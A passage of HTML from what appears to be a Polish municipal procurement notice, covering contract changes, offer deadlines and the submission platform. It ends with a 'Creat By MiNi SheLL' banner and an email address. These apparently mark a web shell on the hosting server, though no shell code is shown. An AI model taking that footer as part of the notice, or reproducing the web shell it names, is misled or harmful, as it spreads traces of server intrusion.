wyższej;<br/>e)	jeśli zaistnieją przesłanki do wprowadzenia zmian wynikłe z art. 455-456 Pzp.<br/>2.Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy zakupowej pod adresem: https://gminatuszyn.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca zobowiązany jest zrealizować przedmiot zamówienia w terminie maksymalnie do 30 dni od daty zawarcia umowy- dotyczy każdej części. Termin wykonania zamówienia stanowi jedno z kryteriów oceny ofert.

Creat By MiNi SheLL
Email: jattceo@gmail.com